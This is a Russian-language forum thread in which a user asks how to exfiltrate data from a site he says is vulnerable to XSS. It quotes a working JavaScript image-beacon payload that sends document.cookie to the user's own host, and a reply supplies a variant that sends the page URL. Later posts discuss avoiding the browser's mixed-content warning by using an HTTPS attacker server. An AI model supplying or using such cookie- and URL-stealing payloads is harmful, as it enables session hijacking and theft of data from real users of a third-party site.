Как передать переменную на другой сервер?

[nicklan]

Есть уязвимый к XSS сайт.
Как сделать так, чтоб я узнал переменную needed?

var needed=window.location.href;

Я так понял, нужно как-то отправить её на мой сервер? Только как это сделать?





P.S. Возможно у вас будет вопрос, зачем мне такое делать, если можно сделать так:

img = new Image(); img.src = "http://мойхост.com/sniffer/img.gif?"+document.cookie;

и узнать HTTP Referrer. Но сайт на HTTPS и я не узнаю HTTP Referrer.

[Livaanderiamarum]

никак

[nicklan]

Тоесть эту переменную никак нельзя передать на какой-то сервер??
хм.. может что-то путаете?

[Octane]

раз можете сделать так

Сообщение от nicklan

img = new Image(); img.src = "http://мойхост.com/sniffer/img.gif?"+document.cookie;

то в чем проблема адрес отправить

img = new Image(); img.src = "http://мойхост.com/sniffer/img.gif?"+encodeURIComponent(location.href);

?

Только браузер выдаст предупреждение.

[nicklan]

Ух! Огроменное спасибо! работает!! Просто мои знания в js небольшие, незнал что так можно!) ещё раз спасибо!

Предупреждение он выдаст в любом случае, если даже в конце будет стоять +document.cookie. Чтобы предупреждения не было нужно иметь сервер с https?

[Octane]

даже если будет сервер с https, домен то все равно будет другой, поэтому от предупреждения никак не избавиться, браузер предупредит о любых загрузках со сторонних источников на https-странице

[Kolyaj]

Сообщение от Octane

даже если будет сервер с https, домен то все равно будет другой, поэтому от предупреждения никак не избавиться

На сторонний https сервер предупреждения не будет, иначе все https сайты с той же Яндекс.Метрикой выдавали бы предупреждения.

[Octane]

черт… никогда не буду нажимать "показать картинки" в gmail

[Livaanderiamarum]

Сообщение от Octane

черт… никогда не буду нажимать "показать картинки" в gmail

думаешь gmail скрипты поддерживает? нет, вопрос не риторический, я хочу узнать думаешь ли ты так?

[Octane]

зачем скрипт для показа картинки?